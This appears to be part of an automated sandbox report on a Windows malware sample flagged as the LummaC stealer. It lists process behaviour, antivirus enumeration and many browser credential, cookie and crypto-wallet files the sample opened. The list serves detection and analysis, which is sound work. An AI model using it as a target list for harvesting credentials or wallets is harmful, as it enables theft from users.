            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9521EE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6F9521EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: RegAsm.exe, 00000031.00000002.2171377376.0000000000D31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
            Source: RegAsm.exe, 00000031.00000002.2172670873.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: RegAsm.exe, 0000002C.00000002.2035425630.0000000000F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: powershell.exe, 0000000D.00000002.1718680362.00000000075F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
